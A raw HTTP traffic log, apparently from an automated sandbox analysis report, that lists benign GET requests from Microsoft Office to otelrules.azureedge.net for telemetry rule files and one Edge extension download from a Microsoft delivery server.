Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731930022&P2=404&P3=2&P4=Wzo5kI1LBBmCTNT5I9ajRHlN%2fQ92HAasUGHNCyXCSnjBeLMVHswnE2hIjmBaV79cajzQGBhicRIHRJFk1iLfHg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: N7et3+2Y8+u6eG01O1ZkmcSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
